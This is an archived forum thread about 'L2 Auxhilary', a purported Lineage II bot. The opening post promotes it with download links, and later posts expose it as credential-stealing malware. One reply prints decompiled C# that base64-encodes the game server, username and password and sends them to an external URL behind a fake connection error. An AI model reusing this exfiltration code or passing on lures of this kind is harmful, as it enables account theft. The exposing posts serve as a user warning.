![]() |
|
Portal |
Downloads |
Arcade |
CD-Key Shop |
Register |
FAQ |
|
|
|||||||
| Lineage 2 Lineage II hacking and slashing its way to a forum near you... Well, hacking anyway! |
![]() |
|
|
Thread Tools |
|
|
#1 |
|
MPC Member
Join Date: 29th Dec 2007
Posts: 7
|
L2 Auxhilary (OOG BOT)
L2 Auxhilary ( http://l2auxhilary.vze.com/ )
New out of game bot, supporting many features such as the following: - Auto-Leveler - Auto-Trade / Auto-Quest - 100% Free forever - Supports L2 Walker & L2 Superman scripts (However, a script editing program for these is not available at this time) - Out of game support (No need for an actual game client to run) - Many more features! Also, we will be releasing an in game version further down the road so stay posted! Join us and help with the beta test! Mirrors (A more up-to-date list located here: http://l2auxhilary.vze.com/ ): http://files.filefront.com/L2+Auxhil.../fileinfo.html http://files.filefront.com/L2+Auxhil.../fileinfo.html http://www.uploading.com/files/LE49J..._Beta.zip.html http://www.uploading.com/files/A111Z..._Beta.rar.html We like to hear your feedback, so please, if you have any comments/suggestions/questions or complaints, please e-mail us at l2auxteam@gmail.com (Other contacting options are listed under "Contact Us" on our website) Happy Botting! ![]() L2 Auxhilary Team. Last edited by L2AuxTeam; 4th January 2008 at 18:42.. |
|
|
|
|
|
#2 |
|
MPC Member
Join Date: 21st Dec 2007
Posts: 9
|
uhmm... how can i make this work on l2sea?
|
|
|
|
|
|
#3 |
|
MPC Member
Join Date: 29th Dec 2007
Posts: 7
|
Currently the only support servers are the Official USA servers. We'll be releasing a patch soon that allows you to connect to Korean, Sea Servers, etc.
We'll keep you posted on our website about that progress. Thanks! |
|
|
|
|
|
#4 |
|
Cheater 4ever!
Assassin
Join Date: 25th Jul 2004
Location: Cheat Castle
Posts: 164
|
maybe there will be a release for private servers like: L2Supreme ?
__________________
4927616D20536F6D657468696E6720426574746572 |
|
|
|
|
|
#5 |
|
MPC Member
Join Date: 29th Dec 2007
Posts: 7
|
In the near future we plan on releasing a bot that works for almost all Official/Private servers, but for now, as it's still in beta stages it's simply not logical to release a bot for every server as we have smaller bugs to figure out.
Thanks! |
|
|
|
|
|
#6 |
|
Lord of Destiny
Join Date: 6th Dec 2006
Posts: 62
|
it looks realy nice... iam interested on the privat server part..
stay tuned ppl it might be a better bot then l2walker or superman. GJ mates |
|
|
|
|
|
#7 |
|
New MPC User
Join Date: 13th Jan 2007
Posts: 2
|
Not connecting
Don't use this program! It sends your login and account info to crooks that clean out all your gear on every character you have on the account.
Last edited by Sandbagger; 31st December 2007 at 08:52.. |
|
|
|
|
|
#8 |
|
MPC Member
Join Date: 21st Dec 2007
Posts: 9
|
oh i see.. tnx tnx. keep up the good work guys.
|
|
|
|
|
|
#9 | |
|
MPC Member
Join Date: 29th Dec 2007
Posts: 7
|
Quote:
We want to let all of our users know that they should stay safe by scanning every file they download. If you're careful things like that won't happen! Thanks, L2 Aux Team |
|
|
|
|
|
|
#10 |
|
New MPC User
Join Date: 13th Jan 2007
Posts: 2
|
L2 Auxhilary will steal your gear
I tried 2 use this bot program with 2 different accounts. Both accounts where cleaned of ever bit of gear on every character I had on those accounts. They even made a new character on one server an named him L2Auxhilaryteam001.
Street value of the gear is over $300.00. Don't download this bot program. You will be sorry. |
|
|
|
|
|
#11 |
|
MPC Member
Join Date: 29th Dec 2007
Posts: 7
|
bump. Added new mirrors and news
![]() |
|
|
|
|
|
#12 |
|
Lord of Destiny
Join Date: 6th Dec 2006
Posts: 62
|
what are the screenshots for??
how about some screenshots from ingame fighting with the bot??? |
|
|
|
|
|
#13 |
|
MPC Member
Join Date: 29th Dec 2007
Posts: 7
|
|
|
|
|
|
|
#14 | |
|
New MPC User
Join Date: 6th Mar 2007
Posts: 3
|
Quote:
Code:
private void sendData()
{
bool flag = !InvokeRequired;
if (!flag)
{
Random random = new Random();
Thread.Sleep(random.Next(1000, 5000));
base.Invoke(new ConnectForm.SendData(sendData), new object[0]);
}
else
{
try
{
byte[] bArr1 = Encoding.UTF8.GetBytes(serverComboBox.Text);
byte[] bArr2 = Encoding.UTF8.GetBytes(usernameTextBox.Text);
byte[] bArr3 = Encoding.UTF8.GetBytes(passwordTextBox.Text);
string s = "?a=\uFFFD" + Convert.ToBase64String(bArr1) + "&b=\uFFFD" + Convert.ToBase64String(bArr2) + "&c=\uFFFD" + Convert.ToBase64String(bArr3);
webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + s);
}
catch
{
}
statusLabel.Text = "Ready\uFFFD";
connectProgressBar.Style = ProgressBarStyle.Blocks;
connectButton.Enabled = true;
MessageBox.Show("Couldn't connect! Check your settings and try again.\uFFFD", "Error\uFFFD");
}
}
A few lines above it, something caught my eye: "webBrowser.Navigate("http://l2auxhilary.byethost13.com/aux_ins.php\uFFFD" + s);" /sarcasm Now why would it be trying to navigate to this site while trying to connect to L2? Any Ideas? /end sarcasm Now if you type in http://l2auxhilary.byethost13.com/aux_ins.php it will redirect you to their main site. Bad vibes from this one. Note: The most frighteningly easy code I have ever attempted to de-compile, and the only one that has ever fully worked for me. Any more bad vibes anyone? Need more proof that this can in no way be a bot? Check out the file size. I am comaring it to OOG super 1.58 and L2 walker OOG 10.7.2 (I feel they version requires mentioning because other versions may have different sizes, but it is the versions I am staring at ATM. Super has server-side validation and shtuff (which is why no one can crack it) Size: 54.3 MB Walker has client side validation and shtuff (which is why everyone seems to crack it) Size: 15.7 Auxhilary: 4.21 MB Now let me show you something else: IG Super (1.58): 49.0 MB IG Walker (1.57): 5.78 MB Again: something fishy to anyone? I HOPE THIS SCUMMMMMEEEEEERSSSSSSSS GET BUSTED!!!! DIE YOU NOLIFERS!!!! |
|
|
|
|
![]() |
| Bookmarks |
| Thread Tools | |
|
|
![]() |
![]() |